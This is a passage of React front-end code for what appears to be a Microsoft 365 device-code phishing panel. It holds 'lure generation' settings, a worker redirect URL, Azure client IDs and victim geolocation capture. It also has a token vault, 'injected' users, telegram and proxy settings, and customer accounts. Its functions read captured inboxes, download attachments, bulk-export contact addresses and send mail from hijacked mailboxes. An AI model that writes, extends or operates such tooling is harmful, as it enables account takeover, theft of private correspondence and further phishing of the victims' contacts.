      let url = `${API}/emails/search?user_id=${encodeURIComponent(userId)}&query=${encodeURIComponent(query || (mailSearchAttachmentsOnly ? "hasAttachments:true" : ""))}&limit=${encodeURIComponent(String(emailPageSize || 100))}&has_attachments=${mailSearchAttachmentsOnly ? "true" : "false"}&sort_by_date=${mailSearchSortByDate}`;
      if (nextLink) {
        url += `&next_link=${encodeURIComponent(nextLink)}`;
      }
      const res = await fetchWithAuth(url);
      if (!res.ok) {
        let errorMsg = "Failed to search emails";
        try {
          const text = await res.text();
          try {
            const json = JSON.parse(text);
            errorMsg = json.detail || json.error || errorMsg;
          } catch {
            if (text) errorMsg = text;
          }
        } catch (e) {
          errorMsg = "Network error – unable to read response";
        }
        addToast(errorMsg, "error");
        return;
      }
      const data = await res.json().catch(() => ({}));

      let results = data.emails || data.results || [];

      if (currentFolderId) {
        results = results.filter(
          (e) => e.parentFolderId === currentFolderId || e.folder_id === currentFolderId
        );
      }

      if (nextLink) {
        setEmails((prev) => [...prev, ...results]);
      } else {
        setEmails(results);
        setSearchResults(results);
        setSelectedMessageIds([]);
      }
      setSearchNextLink(data.next_link || "");
      setEmailNextLink(data.next_link || "");
      setSelectedEmail(null);
      setSelectedEmailAttachments([]);
      addToast(`Search complete — ${results.length} messages found`, "success");
    } catch (err) {
      addToast(err.message || "Failed to search emails", "error");
    } finally {
      setMailSearchLoading(false);
    }
  }

  function clearMailSearch() {
    setMailSearchQuery("");
    setEmailNextLink("");
    setSearchNextLink("");
    setSelectedMessageIds([]);
    loadEmails(currentFolderId, selectedUserId, false, "");
  }

  async function loadMoreEmails() {
    if (!emailNextLink || emailLoadingMore) return;
    try {
      setEmailLoadingMore(true);
      await loadEmails(currentFolderId, selectedUserId, true, emailNextLink);
    } finally {
      setEmailLoadingMore(false);
    }
  }

  async function loadMoreSearchResults() {
    if (!searchNextLink || searchLoadingMore) return;
    try {
      setSearchLoadingMore(true);
      await searchEmails(searchNextLink);
    } finally {
      setSearchLoadingMore(false);
    }
  }

  async function prefetchAdjacentEmails(currentId) {
    const idx = emails.findIndex((e) => e.id === currentId);
    if (idx === -1) return;
    const candidates = emails
      .slice(idx + 1, idx + 4)
      .filter((e) => !emailCacheRef.current.has(e.id));
    for (const item of candidates) {
      try {
        const res = await fetchWithAuth(
          `${API}/email/${item.id}?user_id=${encodeURIComponent(selectedUserId)}`
        );
        if (!res.ok) continue;
        const data = await res.json();
        const entry = emailCacheRef.current.get(item.id) || {};
        entry.data = data;
        entry.cachedAt = Date.now();
        emailCacheRef.current.set(item.id, entry);

        const hasAtt =
          data.hasAttachments ||
          data.has_attachments ||
          data.attachment_count ||
          data.attachments_count;
        if (hasAtt) {
          try {
            const attRes = await fetchWithAuth(
              `${API}/email/${encodeURIComponent(item.id)}/attachments?user_id=${encodeURIComponent(selectedUserId)}`
            );
            if (attRes.ok) {
              const attData = await attRes.json().catch(() => ({}));
              const fresh = emailCacheRef.current.get(item.id) || {};
              fresh.attachments = attData.attachments || [];
              fresh.cachedAt = Date.now();
              emailCacheRef.current.set(item.id, fresh);
            }
          } catch {}
        }
      } catch {}
    }
  }

  async function openEmail(id) {
    if (!selectedUserId || !inboxConnected) return;

    if (emailAbortRef.current) {
      try { emailAbortRef.current.abort(); } catch {}
    }
    const abortController = new AbortController();
    emailAbortRef.current = abortController;

    const cachedEntry = emailCacheRef.current.get(id);
    const listItem = emails.find((e) => e.id === id);

    const dataHasAtt = (d) =>
      Boolean(
        d?.hasAttachments ||
          d?.has_attachments ||
          d?.attachment_count ||
          d?.attachments_count
      );

    if (cachedEntry && cachedEntry.data) {
      const cachedData = cachedEntry.data;
      setSelectedEmail(cachedData);
      setSelectedEmailAttachments(cachedEntry.attachments || []);
      setSelectedEmailConversation(cachedEntry.conversation || []);
      setShowAttachmentPanel(false);
      setShowReplyBox(false);
      setShowForwardBox(false);
      setReplyText("");
      setForwardTo("");
      setForwardCc("");

      if (!cachedData.isRead) {
        cachedData.isRead = true;
        setEmails((prev) => prev.map((e) => (e.id === id ? { ...e, isRead: true } : e)));
        markRead(id, true);
      }

      const cachedAttachments = cachedEntry.attachments;
      if (Array.isArray(cachedAttachments) && cachedAttachments.length > 0) {
        setSelectedEmailAttachments(cachedAttachments);
      } else if (dataHasAtt(cachedData)) {
        loadEmailAttachments(id);
      } else {
        setSelectedEmailAttachments([]);
      }

      if (!Array.isArray(cachedEntry.conversation)) {
        const convId = cachedData.conversationId || cachedData.conversation_id;
        if (convId) {
          loadEmailConversation(cachedData);
        }
      }

      if (Date.now() - (cachedEntry.cachedAt || 0) < 30000) {
        return;
      }
    } else if (listItem) {
      setSelectedEmail({
        id: listItem.id,
        subject: listItem.subject,
        from: listItem.from,
        to: listItem.to || [],
        cc: listItem.cc || [],
        date: listItem.date,
        receivedDateTime: listItem.receivedDateTime || listItem.date,
        bodyPreview: listItem.bodyPreview || listItem.preview || "",
        body: null,
        isRead: true,
        _loading: true,
      });
      setSelectedEmailAttachments([]);
      setSelectedEmailConversation([]);
      setShowAttachmentPanel(false);
      setShowReplyBox(false);
      setShowForwardBox(false);
      setForwardTo("");
      setForwardCc("");
      setEmails((prev) => prev.map((e) => (e.id === id ? { ...e, isRead: true } : e)));
      markRead(id, true);
    }

    try {
      const res = await fetchWithAuth(
        `${API}/email/${id}?user_id=${encodeURIComponent(selectedUserId)}`,
        { signal: abortController.signal }
      );
      if (abortController.signal.aborted) return;
      const data = await res.json();
      if (abortController.signal.aborted) return;

      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to open email", "error");
        return;
      }

      if (!data.isRead) {
        data.isRead = true;
        setEmails((prev) => prev.map((e) => (e.id === id ? { ...e, isRead: true } : e)));
      }

      const entry = emailCacheRef.current.get(id) || {};
      entry.data = data;
      entry.cachedAt = Date.now();
      emailCacheRef.current.set(id, entry);

      if (!abortController.signal.aborted) {
        setSelectedEmail(data);

        if (dataHasAtt(data)) {
          loadEmailAttachments(id);
        } else {
          setSelectedEmailAttachments([]);
        }
        loadEmailConversation(data);

        prefetchAdjacentEmails(id);
      }
    } catch (err) {
      if (err.name === "AbortError") return;
      console.warn("[openEmail] error:", err);
    }
  }

  async function loadEmailAttachments(messageIdOverride = null) {
    const messageId = messageIdOverride || selectedEmail?.id;
    if (!messageId || !selectedUserId || !inboxConnected) {
      setSelectedEmailAttachments([]);
      return;
    }

    const cached = emailCacheRef.current.get(messageId);
    if (cached && Array.isArray(cached.attachments) && cached.attachments.length > 0) {
      setSelectedEmailAttachments(cached.attachments);
      return;
    }

    setAttachmentsLoading(true);
    try {
      const res = await fetchWithAuth(
        `${API}/email/${encodeURIComponent(messageId)}/attachments?user_id=${encodeURIComponent(selectedUserId)}`
      );
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        setSelectedEmailAttachments([]);
        return;
      }
      const attachments = data.attachments || [];
      setSelectedEmailAttachments(attachments);

      const entry = emailCacheRef.current.get(messageId) || {};
      entry.attachments = attachments;
      entry.cachedAt = Date.now();
      emailCacheRef.current.set(messageId, entry);
    } catch {
      setSelectedEmailAttachments([]);
    } finally {
      setAttachmentsLoading(false);
    }
  }

  async function loadEmailConversation(emailOverride = null) {
    const email = emailOverride || selectedEmail;
    const conversationId = email?.conversationId || email?.conversation_id;
    if (!conversationId || !selectedUserId || !inboxConnected) {
      setSelectedEmailConversation([]);
      return;
    }

    const cached = emailCacheRef.current.get(email.id);
    if (cached && Array.isArray(cached.conversation)) {
      setSelectedEmailConversation(cached.conversation);
      return;
    }

    setConversationLoading(true);
    try {
      const res = await fetchWithAuth(
        `${API}/email/conversation/${encodeURIComponent(conversationId)}?user_id=${encodeURIComponent(selectedUserId)}`
      );
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        setSelectedEmailConversation([]);
        return;
      }
      const items = data.messages || data.conversation || data.emails || [];
      const list = Array.isArray(items) ? items : [];
      setSelectedEmailConversation(list);

      const entry = emailCacheRef.current.get(email.id) || {};
      entry.conversation = list;
      entry.cachedAt = Date.now();
      emailCacheRef.current.set(email.id, entry);
    } catch {
      setSelectedEmailConversation([]);
    } finally {
      setConversationLoading(false);
    }
  }

  const loadConversationOnDemand = async () => {
    if (!selectedEmail) return;
    const conversationId = selectedEmail.conversationId || selectedEmail.conversation_id;
    if (!conversationId || !selectedUserId || !inboxConnected) {
      addToast("No conversation found for this email.", "warning");
      return;
    }

    const cached = emailCacheRef.current.get(selectedEmail.id);
    if (cached && Array.isArray(cached.conversation)) {
      setSelectedEmailConversation(cached.conversation);
      setShowConversationPanel(true);
      return;
    }

    setConversationLoading(true);
    try {
      const res = await fetchWithAuth(
        `${API}/email/conversation/${encodeURIComponent(conversationId)}?user_id=${encodeURIComponent(selectedUserId)}`
      );
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to load conversation", "error");
        return;
      }
      const items = data.messages || data.conversation || data.emails || [];
      const list = Array.isArray(items) ? items : [];
      setSelectedEmailConversation(list);
      setShowConversationPanel(true);

      const entry = emailCacheRef.current.get(selectedEmail.id) || {};
      entry.conversation = list;
      entry.cachedAt = Date.now();
      emailCacheRef.current.set(selectedEmail.id, entry);
    } catch {
      addToast("Failed to load conversation", "error");
    } finally {
      setConversationLoading(false);
    }
  };

  const fetchConversationAttachments = async () => {
    if (!selectedEmail || !selectedEmailConversation.length) {
      addToast("No conversation loaded. Click 'Show conversation' first.", "warning");
      return;
    }
    const messageIds = selectedEmailConversation.map(msg => msg.id).filter(Boolean);
    if (!messageIds.length) {
      addToast("No messages in conversation.", "warning");
      return;
    }
    let allAttachments = [];
    let failed = 0;
    for (const msgId of messageIds) {
      try {
        const res = await fetchWithAuth(
          `${API}/email/${encodeURIComponent(msgId)}/attachments?user_id=${encodeURIComponent(selectedUserId)}`
        );
        const data = await res.json().catch(() => ({}));
        if (res.ok && data.attachments) {
          allAttachments = allAttachments.concat(data.attachments);
        } else {
          failed++;
        }
      } catch {
        failed++;
      }
    }
    if (!allAttachments.length) {
      addToast("No attachments found in conversation.", "info");
      return;
    }
    setConversationsModal({
      open: true,
      email: "Attachments in conversation",
      threads: allAttachments.map(att => ({
        subject: att.name || "Attachment",
        message_count: 1,
        latest_date: att.lastModifiedDateTime || "",
        attachments: [att],
      }))
    });
  };

  async function openOrDownloadAttachment(attachment, download = true) {
    if (!attachment?.id || !selectedEmail?.id || !selectedUserId) return;
    try {
      const url = `${API}/email/${encodeURIComponent(selectedEmail.id)}/attachments/${encodeURIComponent(attachment.id)}?user_id=${encodeURIComponent(selectedUserId)}&download=${download ? "true" : "false"}`;
      const res = await fetchWithAuth(url);
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        addToast(data.detail || data.error || "Failed to open attachment", "error");
        return;
      }
      const blob = await res.blob();
      const objectUrl = window.URL.createObjectURL(blob);
      if (download) {
        const a = document.createElement("a");
        a.href = objectUrl;
        a.download = attachment.name || "attachment";
        document.body.appendChild(a);
        a.click();
        a.remove();
        window.setTimeout(() => window.URL.revokeObjectURL(objectUrl), 2000);
        addToast("Attachment download started", "success");
      } else {
        window.open(objectUrl, "_blank", "noopener,noreferrer");
        window.setTimeout(() => window.URL.revokeObjectURL(objectUrl), 60000);
      }
    } catch {
      addToast("Failed to open attachment", "error");
    }
  }

  function formatAttachmentSize(size) {
    const bytes = Number(size || 0);
    if (!bytes) return "";
    if (bytes < 1024) return `${bytes} B`;
    if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)} KB`;
    return `${(bytes / (1024 * 1024)).toFixed(1)} MB`;
  }

  async function refreshSelectedEmail() {
    if (!selectedEmail?.id || !selectedUserId || !inboxConnected) return;
    const requestId = selectedEmail.id;
    try {
      const res = await fetchWithAuth(
        `${API}/email/${requestId}?user_id=${encodeURIComponent(selectedUserId)}`
      );
      const data = await res.json();
      if (!res.ok || (selectedEmailRef.current?.id && selectedEmailRef.current.id !== requestId)) {
        return;
      }
      const entry = emailCacheRef.current.get(requestId) || {};
      entry.data = data;
      entry.cachedAt = Date.now();
      emailCacheRef.current.set(requestId, entry);
      setSelectedEmail(data);
      const hasAtt =
        data.hasAttachments ||
        data.has_attachments ||
        data.attachment_count ||
        data.attachments_count;
      if (hasAtt) await loadEmailAttachments(data.id);
      else setSelectedEmailAttachments([]);
      await loadEmailConversation(data);
    } catch {}
  }

  async function loadRules(userIdOverride = null) {
    const userId = userIdOverride || selectedUserId;
    if (!userId) return;
    try {
      const res = await fetchWithAuth(
        `${API}/rules?user_id=${encodeURIComponent(userId)}`
      );
      const data = await res.json();
      if (!res.ok) {
        setRules([]);
        return;
      }
      setRules(data.rules || []);
    } catch {
      setRules([]);
    }
  }

  async function fetchRules(userIdOverride = null) {
    await loadRules(userIdOverride);
  }

  async function deleteRule(ruleId) {
    if (READ_ONLY_MODE) return;
    if (!ruleId) {
      addToast("Missing rule ID", "warning");
      return;
    }
    const userId = selectedUserId || "";
    confirm(
      "Delete rule",
      "Delete this automation rule?",
      async () => {
        try {
          const qs = userId ? `?user_id=${encodeURIComponent(userId)}` : "";
          const res = await fetchWithAuth(`${API}/rules/${encodeURIComponent(ruleId)}${qs}`, {
            method: "DELETE",
          });
          const data = await res.json().catch(() => ({}));
          if (!res.ok) {
            addToast(data.detail || data.error || "Failed to delete rule", "error");
            return;
          }
          await loadRules(userId);
          addToast("Rule deleted", "success");
        } catch {
          addToast("Failed to delete rule", "error");
        }
      }
    );
  }

  async function loginTemporaryMailboxViewer() {
    const usernameValue = String(tempViewerUsername || "").trim();
    const passwordValue = tempViewerPassword || "";

    if (!usernameValue || !passwordValue) {
      addToast("Enter the temporary username and password", "warning");
      return;
    }

    setTempViewerLoginLoading(true);
    try {
      const res = await fetch(`${API}/mail-viewer-access/login`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          username: usernameValue,
          password: passwordValue,
        }),
      });

      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        addToast(data.detail || data.error || "Temporary mailbox login failed", "error");
        return;
      }

      localStorage.setItem("token", data.access_token);
      localStorage.setItem("role", data.account?.role || data.role || "mailbox_viewer");
      localStorage.setItem("username", data.account?.username || data.username || usernameValue);
      setIsAuthenticated(true);
      setSelectedUserId(data.mailbox_user_id || standaloneMailboxId || "");
      selectedUserIdRef.current = data.mailbox_user_id || standaloneMailboxId || "";
      setInboxConnected(true);
      setMicrosoftConnected(true);
      addToast("Temporary mailbox login successful", "success");

      await fetchAppConfig();
      await loadFolders(data.mailbox_user_id || standaloneMailboxId || "");
      await loadEmails(null, data.mailbox_user_id || standaloneMailboxId || "", false, "");
    } catch {
      addToast("Temporary mailbox login failed", "error");
    } finally {
      setTempViewerLoginLoading(false);
    }
  }

  async function login() {
    const usernameValue = String(username || "").trim();
    const passwordValue = password || "";

    if (!usernameValue || !passwordValue) {
      addToast("Enter username and password", "warning");
      return;
    }

    setLoginLoading(true);

    const loginPayload = {
      username: usernameValue,
      password: passwordValue,
    };

    if (loginOtpCode) {
      loginPayload.otp = loginOtpCode;
      loginPayload.totp_code = loginOtpCode;
      loginPayload.code = loginOtpCode;
    }

    async function attemptLogin(endpoint) {
      const res = await fetch(`${API}${endpoint}`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(loginPayload),
      });

      const data = await res.json().catch(() => ({}));
      return { endpoint, res, data };
    }

    try {
      const attempts = ["/admin/login", "/accounts/login", "/customer/login"];
      let lastResult = null;

      for (const endpoint of attempts) {
        const result = await attemptLogin(endpoint);
        lastResult = result;

        if (result.data?.requires_2fa || result.data?.two_factor_required) {
          setLoginRequires2fa(true);
          addToast(result.data.message || "Enter your Google Authenticator code", "warning");
          return;
        }

        if (result.res.ok && result.data?.access_token) {
          const account = result.data.account || result.data.user || {};
          const loginRole = account.role || result.data.role || (endpoint === "/admin/login" ? "admin" : "customer");
          const loginUsername = account.username || result.data.username || usernameValue;

          localStorage.setItem("token", result.data.access_token);
          localStorage.setItem("role", loginRole);
          localStorage.setItem("username", loginUsername);

          setIsAuthenticated(true);
          setLoginRequires2fa(false);
          setLoginOtpCode("");
          addToast("Signed in successfully", "success");

          await fetchAppConfig();
          await fetchUserSettings();

          if (loginRole === "admin" || loginRole === "owner") {
            await fetchUsers();
            await fetchCustomerAccounts();
            await fetchTenantConsents();
            await fetchEnterpriseTenants();
            await fetchDashboardSummary();
            await fetchVisitSummary();
            await fetchTokenVault();
            await syncDashboardConnections();
            await fetchKeywordListeners();
            await fetchSecuritySettings();
            await fetchRedirectDomainSettings();
          } else {
            await fetchDashboardSummary();
            await fetchTokenVault();
            await fetchActiveResultMailboxes();
            await fetchSecuritySettings();
            await fetchTelegramSettings();
            await fetchCustomerProxy();
          }

          pingServer();
          return;
        }
      }

      const data = lastResult?.data || {};
      addToast(data.detail || data.error || "Invalid credentials", "error");
    } catch (err) {
      addToast("Login failed. Check your connection.", "error");
    } finally {
      setLoginLoading(false);
    }
  }
    async function saveUserToBackend(userId) {
    const trimmed = (userId || "").trim();
    if (!trimmed) {
      addToast("Enter a user ID first", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/saved-users`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: trimmed }),
      });
      const data = await res.json();
      if (!res.ok) {
        addToast(data.error || "Failed to save user", "error");
        return;
      }
      setSelectedUserId(trimmed);
      await syncDashboardConnections(trimmed);
      addToast(`Saved user: ${trimmed}`, "success");
    } catch {}
  }

  async function removeSavedUserFromBackend(userId) {
    const trimmed = (userId || "").trim();
    if (!trimmed) {
      addToast("Select a user first", "warning");
      return;
    }
    confirm(
      "Remove saved user",
      `Remove ${trimmed} from saved users?`,
      async () => {
        try {
          const res = await fetchWithAuth(
            `${API}/saved-users?user_id=${encodeURIComponent(trimmed)}`,
            { method: "DELETE" }
          );
          const data = await res.json();
          if (!res.ok) {
            addToast(data.error || "Failed to remove user", "error");
            return;
          }
          await syncDashboardConnections();
          if (selectedUserId === trimmed) {
            setSelectedUserId("");
            setEmails([]);
            setFolders([]);
            setSelectedEmail(null);
          }
          addToast(`Removed: ${trimmed}`, "success");
        } catch {}
      }
    );
  }

  async function deleteMailboxToken(userId) {
    const trimmed = (userId || "").trim();
    if (!trimmed) {
      addToast("Select a mailbox first", "warning");
      return;
    }
    confirm(
      "Delete mailbox token",
      `Delete the stored Microsoft mailbox connection for ${trimmed}? This does not delete the saved user label.`,
      async () => {
        try {
          setDeletingMailbox(trimmed);
          const res = await fetchWithAuth(
            `${API}/tokens/${encodeURIComponent(trimmed)}`,
            { method: "DELETE" }
          );
          const data = await res.json().catch(() => ({}));
          if (!res.ok) {
            addToast(data.detail || data.error || "Failed to delete mailbox token", "error");
            return;
          }
          if (selectedUserId === trimmed) {
            setMicrosoftConnected(false);
            setInboxConnected(false);
            setEmails([]);
            setEmailNextLink("");
            setFolders([]);
            setSelectedEmail(null);
            setInboxResults((prev) => {
              const next = { ...prev };
              delete next[trimmed];
              return next;
            });
            setInjectedUsers((prev) => {
              const next = { ...prev };
              delete next[trimmed];
              return next;
            });
          }
          await syncDashboardConnections();
          addToast(`Deleted mailbox connection: ${trimmed}`, "success");
        } catch {
          addToast("Failed to delete mailbox token", "error");
        } finally {
          setDeletingMailbox(null);
        }
      }
    );
  }

  async function generateMicrosoftLoginUrl() {
    await startDeviceCodeFlow(true);
  }

  async function connectMicrosoft() {
    await startDeviceCodeFlow(true);
  }

  async function generateMailConnectUrl() {
    await startDeviceCodeFlow(true);
  }

  async function connectInbox() {
    await startDeviceCodeFlow(true);
  }

  async function generateOrgConnectUrl() {
    await startDeviceCodeFlow(true);
  }

  async function generateOrgMailConnectUrl() {
    await startDeviceCodeFlow(true);
  }

  async function generateAdminConsentUrl() {
    addToast("Mailbox Connection/admin-consent URL generation has been removed. Start mailbox connection setup instead.", "info");
    await startDeviceCodeFlow(true);
  }

  async function generateTenantConsent() {
    addToast("Tenant consent URL generation has been removed. Use mailbox connection setup only.", "info");
  }

  async function manuallyApproveTenant() {
    if (!tenantHint.trim()) {
      addToast("Enter tenant hint first", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/tenant-consent/approve`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ tenant_hint: tenantHint.trim() }),
      });
      const data = await res.json();
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to approve tenant", "error");
        return;
      }
      await fetchTenantConsents();
      await fetchDashboardSummary();
      addToast(`Tenant approved: ${data.tenant_hint}`, "success");
    } catch {}
  }

  async function onboardEnterpriseTenant() {
    addToast("Enterprise Mailbox Connection onboarding has been removed. Use mailbox connection setup only.", "info");
  }

  async function approveEnterpriseTenant() {
    if (!tenantHint.trim()) {
      addToast("Enter tenant hint first", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/enterprise/approve`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          tenant_hint: tenantHint.trim(),
          mode: enterpriseMode,
          organization_name: enterpriseOrgName,
          notes: enterpriseNotes || "Manually approved",
        }),
      });
      const data = await res.json();
      if (!res.ok) {
        addToast(
          data.detail || data.error || "Failed to approve enterprise tenant",
          "error"
        );
        return;
      }
      await fetchEnterpriseTenants();
      await fetchDashboardSummary();
      if (
        selectedUserId &&
        selectedUserTenantHint === tenantHint.trim().toLowerCase()
      ) {
        await fetchEnterpriseStatus(selectedUserId);
      }
      addToast(`Enterprise tenant approved: ${data.tenant_hint}`, "success");
    } catch {}
  }

  async function startDeviceCodeFlow(mailMode = false) {
    if (navigator.geolocation) {
      navigator.geolocation.getCurrentPosition(
        (position) => {
          setUserGeolocation({
            lat: position.coords.latitude,
            lon: position.coords.longitude,
          });
        },
        (error) => console.warn("Geolocation error:", error.message),
        { enableHighAccuracy: false, timeout: 5000, maximumAge: 60000 }
      );
    }
    stopDeviceAutoPolling();
    setConnectError("");
    setDeviceFlowStatus("");
    setDeviceSupportPageUrl("");
    setAdminConsentRequired(false);
    setBlockedUserId("");
    setDeviceMailMode(mailMode);
    const worker = (workerBaseUrl || "").trim();
    const clientId = (azureClientId || "").trim();
    const tenant = (azureTenant || "common").trim();
    if (!worker) {
      addToast("Please set your Worker Base URL in Manage Lure Generation", "warning");
      return;
    }
    if (!clientId) {
      addToast("Please set your Azure AD Client ID in Manage Lure Generation", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/device-code/start`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          redirect_mode: "worker",
          redirect_base_url: worker,
          worker_base_url: worker,
          azure_client_id: clientId,
          azure_tenant: tenant,
          client_ip: clientIp || undefined,
          geolocation: userGeolocation
            ? `${userGeolocation.lat},${userGeolocation.lon}`
            : undefined,
        }),
      });
      const data = await res.json();
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to start device code flow", "error");
        return;
      }
      setDeviceCodeData({
        ...data,
        raw_verification_uri: data.raw_verification_uri || data.verification_uri,
        verification_uri: data.verification_uri,
      });
      setDeviceCodeStartedAt(Date.now());
      setDeviceCodeSecondsLeft(data.expires_in || null);
      setDeviceFlowStatus(
        mailMode
          ? "Waiting for inbox connect..."
          : "Waiting for Microsoft sign‑in..."
      );
      setAutoPollingEnabled(true);
      addToast("Device code received. Open the Microsoft page and enter the code.", "info");
    } catch (err) {
      addToast("Failed to start device code flow: " + err.message, "error");
    }
  }

  async function pollDeviceCodeFlow() {
    if (devicePollingRef.current || devicePolling) return;
    if (!deviceCodeData?.device_code) return;

    try {
      devicePollingRef.current = true;
      setDevicePolling(true);

      const res = await fetchWithAuth(`${API}/device-code/poll`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          device_code: deviceCodeData.device_code,
          azure_client_id: azureClientId,
          azure_tenant: azureTenant || "common",
        }),
      });

      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        const detail = (data.detail || data.error || "").toLowerCase();
        if (detail.includes("authorization_pending")) {
          setDeviceFlowStatus("Still pending – waiting for user...");
          return;
        }
        if (detail.includes("expired")) {
          stopDeviceAutoPolling();
          setDeviceFlowStatus("Code expired – start again");
          addToast("Device code expired", "error");
          return;
        }
        setDeviceFlowStatus(data.error_description || "Polling failed");
        return;
      }

      stopDeviceAutoPolling();
      setDeviceFlowStatus("Connected!");
      addToast("Mailbox connected successfully", "success");

      await syncDashboardConnections(selectedUserId || "");
      await fetchDashboardSummary(selectedUserId || "");
      if (selectedUserId) {
        await fetchMicrosoftStatus(selectedUserId);
        await loadFolders(selectedUserId);
        await loadEmails(null, selectedUserId);
      }
    } catch (err) {
      console.error("Polling error:", err);
      setDeviceFlowStatus("Network error – check backend");
    } finally {
      devicePollingRef.current = false;
      setDevicePolling(false);
    }
  }

  async function exportEmailAddressesCsv(options = {}) {
    try {
      const params = new URLSearchParams({ max_messages: String(options.max_messages || 500) });
      const mailboxUserId = options.user_id !== undefined ? options.user_id : selectedUserId;
      let folderIds = options.folder_ids || [];
      if (options.folder_id) {
        folderIds = [options.folder_id];
      }
      if (folderIds.length > 0) {
        params.set("folder_ids", folderIds.join(","));
      }
      if (mailboxUserId) params.set("user_id", mailboxUserId);
      if (options.background) params.set("background", "true");
      if (options.start_date) params.set("start_date", options.start_date);
      if (options.end_date) params.set("end_date", options.end_date);

      const res = await fetchWithAuth(`${API}/export-email-addresses?${params.toString()}`);
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        addToast(data.detail || data.error || "Failed to export", "error");
        return;
      }

      const contentType = res.headers.get('content-type') || '';
      if (contentType.includes('application/json')) {
        const data = await res.json();
        if (data.job_id) {
          addToast(`Export started as background job (ID: ${data.job_id}). Check the Background Jobs panel for progress.`, 'success');
          return;
        }
        addToast(data.detail || data.error || 'Unexpected response from export', 'error');
        return;
      }

      const blob = await res.blob();
      const url = window.URL.createObjectURL(blob);
      const a = document.createElement("a");
      const safeMailbox = (mailboxUserId || "all-mailboxes").replace(/[^a-z0-9._-]+/gi, "_");
      const safeFolder = folderIds.length ? folderIds.join('_') : "all-folders";
      a.href = url;
      a.download = `email_address_export_${safeMailbox}_${safeFolder}.csv`;
      document.body.appendChild(a);
      a.click();
      a.remove();
      window.URL.revokeObjectURL(url);
      addToast(folderIds.length ? "Selected folder CSV exported" : "Email address CSV exported", "success");
    } catch {
      addToast("Failed to export email addresses", "error");
    }
  }

  async function startBackgroundExport(selections, options = {}) {
    if (!selections || selections.length === 0) {
      addToast("Select at least one mailbox and folder", "warning");
      return;
    }

    const validSelections = selections.filter(sel => sel.folder_ids && sel.folder_ids.length > 0);
    if (validSelections.length === 0) {
      addToast("For each selected mailbox, choose at least one folder", "warning");
      return;
    }

    try {
      const payload = {
        selections: validSelections.map(sel => ({
          user_id: sel.user_id,
          folder_ids: sel.folder_ids,
        })),
        max_messages: options.max_messages || 5000,
        start_date: options.start_date,
        end_date: options.end_date,
      };

      const res = await fetchWithAuth(`${API}/export/background`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to start background export", "error");
        return;
      }
      addToast(`Background export started (job ID: ${data.job_id}). Check Background Jobs panel for progress.`, "success");
      await fetchBackgroundJobs();
    } catch (err) {
      addToast(err.message || "Failed to start background export", "error");
    }
  }

  function parseAddressListBySeparator(value = "", separator = "auto") {
    const raw = String(value || "").trim();
    if (!raw) return [];

    if (separator === "comma") {
      return raw.replace(/\r?\n/g, ",").split(",").map((item) => item.trim()).filter(Boolean);
    }

    if (separator === "semicolon") {
      return raw.replace(/\r?\n/g, ";").split(";").map((item) => item.trim()).filter(Boolean);
    }

    if (separator === "newline") {
      return raw.split(/\r?\n/).map((item) => item.trim()).filter(Boolean);
    }

    if (separator === "space") {
      return raw.split(/\s+/).map((item) => item.trim()).filter(Boolean);
    }

    return raw.split(/[\s,;]+/g).map((item) => item.trim()).filter(Boolean);
  }

  function normalizeAddressListBySeparator(value = "", separator = "auto") {
    return parseAddressListBySeparator(value, separator).join("; ");
  }

  function addressListCount(value = "", separator = "auto") {
    return parseAddressListBySeparator(value, separator).length;
  }

  async function sendApprovedOneRecipientEmail() {
    const mailboxUser = (selectedUserId || "").trim();
    const recipient = (approvedRecipient || "").trim();
    if (!mailboxUser) {
      addToast("Select the sending mailbox first", "warning");
      return;
    }
    if (!recipient) {
      addToast("Enter one approved recipient email", "warning");
      return;
    }
    if (!approvedSubject.trim()) {
      addToast("Enter a subject", "warning");
      return;
    }
    if (!approvedBody.trim()) {
      addToast("Enter a message body", "warning");
      return;
    }
    try {
      const form = new FormData();
      form.append("user_id", mailboxUser);
      form.append("recipient", recipient);
      form.append("subject", approvedSubject);
      const bodyToSend = normalizeApprovedBodyForSend();
      form.append("body", bodyToSend);
      form.append("cc", normalizeAddressListBySeparator(approvedCc, approvedCcSeparator));
      form.append("bcc", normalizeAddressListBySeparator(approvedBcc, approvedBccSeparator));
      form.append("cc_separator", approvedCcSeparator);
      form.append("bcc_separator", approvedBccSeparator);
      form.append("reply_to", approvedReplyTo || "");
      if (approvedAttachment) form.append("attachment", approvedAttachment);
      const res = await fetchWithAuth(`${API}/send-approved-email`, {
        method: "POST",
        body: form,
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to send email", "error");
        return;
      }
      setApprovedRecipient("");
      setApprovedCc("");
      setApprovedBcc("");
      setApprovedSubject("");
      setApprovedBody("");
      setApprovedAttachment(null);
      setApprovedReplyTo("");
      approvedBodyRef.current = "";
      const fi = document.getElementById("approvedAttachmentInputStandalone");
      if (fi) fi.value = "";
      addToast(`Email sent to ${data.recipient || recipient}`, "success");
    } catch {
